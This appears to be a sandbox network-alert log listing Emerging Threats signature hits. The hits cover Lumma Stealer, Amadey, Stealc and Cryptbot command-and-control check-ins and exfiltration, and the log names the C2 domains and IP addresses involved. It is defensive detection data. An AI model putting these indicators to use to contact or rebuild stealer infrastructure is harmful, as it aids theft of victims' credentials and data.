                                                                                                                                                                                                                                                              2024-12-22T02:16:37.412391+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449831104.21.67.146443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:37.421176+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44983031.41.244.1180TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:37.742476+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.449832172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:37.742476+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449832172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:38.219742+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449831104.21.67.146443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:38.219742+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449831104.21.67.146443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:40.187887+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.449837172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:40.187887+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449837172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:42.400597+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449842185.215.113.4380TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:42.967084+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.449843172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:42.967084+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449843172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:43.035757+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449844104.21.67.146443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:43.848701+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44985131.41.244.1180TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:45.360976+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449852104.21.67.146443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:45.744612+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.449858172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:45.744612+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449858172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:46.656890+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449852104.21.67.146443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:48.149320+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449863104.21.67.146443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:49.044371+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449865185.215.113.4380TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:49.288084+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.449866212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:50.948817+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44987231.41.244.1180TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:50.956303+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.449875172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:50.956303+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449875172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:51.289707+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449876104.21.67.146443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:51.740330+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449875172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:54.041776+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449885104.21.67.146443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:55.433332+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.449890212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:57.698061+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449897104.21.67.146443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:58.461627+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449897104.21.67.146443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:17:01.316285+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449906185.215.113.4380TCP
                                                                                                                                                                                                                                                              2024-12-22T02:17:01.499458+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.449907212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:17:02.800003+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44991431.41.244.1180TCP
                                                                                                                                                                                                                                                              2024-12-22T02:17:07.846728+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.449925212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:17:13.860156+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449942185.215.113.4380TCP
                                                                                                                                                                                                                                                              2024-12-22T02:17:13.976404+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.449945212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:17:15.391073+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44994731.41.244.1180TCP
                                                                                                                                                                                                                                                              2024-12-22T02:17:20.238998+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.449960212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:17:26.611114+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.449974212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:17:26.991253+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449978185.215.113.4380TCP
                                                                                                                                                                                                                                                              2024-12-22T02:17:28.444771+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44998031.41.244.1180TCP
                                                                                                                                                                                                                                                              2024-12-22T02:17:33.198289+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.449991212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:17:36.074423+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449997185.215.113.4380TCP
                                                                                                                                                                                                                                                              2024-12-22T02:17:37.607585+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.450004185.215.113.1680TCP
                                                                                                                                                                                                                                                              2024-12-22T02:17:38.683428+01002054350ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M41192.168.2.450005185.121.15.19280TCP
                                                                                                                                                                                                                                                              2024-12-22T02:17:39.353977+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450011212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:17:40.574994+01002054350ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M41192.168.2.450016185.121.15.19280TCP
                                                                                                                                                                                                                                                              2024-12-22T02:17:44.671627+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.450024185.215.113.4380TCP
                                                                                                                                                                                                                                                              2024-12-22T02:17:45.817182+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450025212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:17:46.221182+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.450026185.215.113.1680TCP
                                                                                                                                                                                                                                                              2024-12-22T02:17:50.734247+01002058378ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)1192.168.2.4612531.1.1.153UDP
                                                                                                                                                                                                                                                              2024-12-22T02:17:51.632273+01002058364ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)1192.168.2.4650721.1.1.153UDP
                                                                                                                                                                                                                                                              2024-12-22T02:17:52.164628+01002058360ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat)1192.168.2.4539981.1.1.153UDP
                                                                                                                                                                                                                                                              2024-12-22T02:17:53.064208+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450051212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:17:53.710812+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.450060104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:17:53.710812+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450060104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:17:54.744267+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.450060104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:17:54.744267+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450060104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:17:55.833608+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.450061185.215.113.4380TCP
                                                                                                                                                                                                                                                              2024-12-22T02:17:56.390951+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.450068104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:17:56.390951+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450068104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:17:57.454162+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.450069185.215.113.1680TCP
                                                                                                                                                                                                                                                              2024-12-22T02:17:59.189888+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.450068104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:17:59.189888+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450068104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:17:59.422173+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450078212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:04.224431+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.450089185.215.113.4380TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:05.847798+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.450096185.215.113.1680TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:06.202323+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450097212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:09.608650+01002058378ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)1192.168.2.4607891.1.1.153UDP
                                                                                                                                                                                                                                                              2024-12-22T02:18:09.812504+01002058364ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)1192.168.2.4498391.1.1.153UDP
                                                                                                                                                                                                                                                              2024-12-22T02:18:11.249239+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.450120104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:11.249239+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450120104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:12.264243+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.450120104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:12.264243+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450120104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:12.442007+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.450121185.215.113.20680TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:12.786767+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450124212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:12.967736+01002044244ET MALWARE Win32/Stealc Requesting browsers Config from C21192.168.2.450121185.215.113.20680TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:13.123701+01002044245ET MALWARE Win32/Stealc Active C2 Responding with browsers Config1185.215.113.20680192.168.2.450121TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:13.327037+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.450125104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:13.327037+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450125104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:13.443362+01002044246ET MALWARE Win32/Stealc Requesting plugins Config from C21192.168.2.450121185.215.113.20680TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:13.727782+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.450128104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:13.727782+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450128104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:13.931765+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1185.215.113.20680192.168.2.450121TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:14.500972+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.450128104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:14.500972+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450128104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:15.274222+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.450129185.215.113.4380TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:15.340948+01002044248ET MALWARE Win32/Stealc Submitting System Information to C21192.168.2.450121185.215.113.20680TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:15.853049+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.450134104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:15.853049+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450134104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:16.150144+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.450121185.215.113.20680TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:18.929899+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450139212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:19.112536+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.450140104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:19.112536+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450140104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:20.871417+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.450141104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:20.871417+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450141104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:21.671674+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.450141104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:24.407639+01002054350ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M41192.168.2.450144185.121.15.19280TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:25.476403+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450153212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:26.676005+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.450157104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:26.676005+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450157104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:27.288592+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.450158104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:27.288592+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450158104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:31.148526+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.450162104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:31.148526+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450162104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:32.076457+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450165212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:35.225117+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.450168104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:35.225117+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450168104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:35.564629+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.450169104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:35.564629+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450169104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:37.111236+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.450163185.215.113.20680TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:38.307122+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450171212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:39.513727+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.450163185.215.113.20680TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:40.872079+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.450174104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:40.872079+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450174104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:41.135548+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.450163185.215.113.20680TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:41.650873+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450174104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:42.521973+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.450163185.215.113.20680TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:42.523962+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.450177104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:42.523962+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450177104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:42.555707+01002058378ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)1192.168.2.4642821.1.1.153UDP
                                                                                                                                                                                                                                                              2024-12-22T02:18:42.810886+01002058364ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)1192.168.2.4520721.1.1.153UDP
                                                                                                                                                                                                                                                              2024-12-22T02:18:43.359656+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.450178185.215.113.1680TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:44.392432+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.450180104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:44.392432+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450180104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:45.247121+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450181212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:45.568691+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.450180104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:45.568691+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450180104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:46.528368+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.450163185.215.113.20680TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:46.898718+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450185104.21.89.115443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:47.155471+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.450186104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:47.155471+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450186104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:47.244318+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.450189104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:47.244318+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450189104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:47.900850+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.450185104.21.89.115443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:47.900850+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450185104.21.89.115443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:47.990676+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.450163185.215.113.20680TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:48.034298+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.450189104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:48.034298+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450189104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:48.068143+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450186104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:49.505434+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450205104.21.89.115443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:49.630549+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.450203185.215.113.1680TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:50.417360+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.450205104.21.89.115443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:50.417360+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450205104.21.89.115443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:51.583167+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.450222104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:51.583167+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450222104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:51.845973+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450223212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:52.550863+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.450222104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:53.046933+01002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.4380192.168.2.450191TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:54.202297+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.450238104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:54.202297+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450238104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:54.437305+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.450233185.215.113.4380TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:54.451679+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450240104.21.67.146443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:54.731503+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.450241185.215.113.1680TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:54.885994+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.450240104.21.67.146443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:54.885994+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450240104.21.67.146443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:55.118304+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450242104.21.89.115443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:56.513771+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.450246104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:56.513771+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450246104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:56.542531+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450247104.21.67.146443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:57.308338+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.450247104.21.67.146443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:57.308338+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450247104.21.67.146443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:57.563608+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450250104.21.89.115443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:58.413276+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.450250104.21.89.115443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:58.504689+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450252212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:59.069531+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.450253104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:59.069531+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450253104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:18:59.716293+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450254104.21.89.115443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:19:02.605590+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450263104.21.89.115443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:19:03.057225+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450264104.21.67.146443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:19:04.170244+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.450264104.21.67.146443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:19:05.019592+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450269212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:19:05.407782+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450274104.21.67.146443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:19:05.778609+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.450276104.21.21.99443TCP
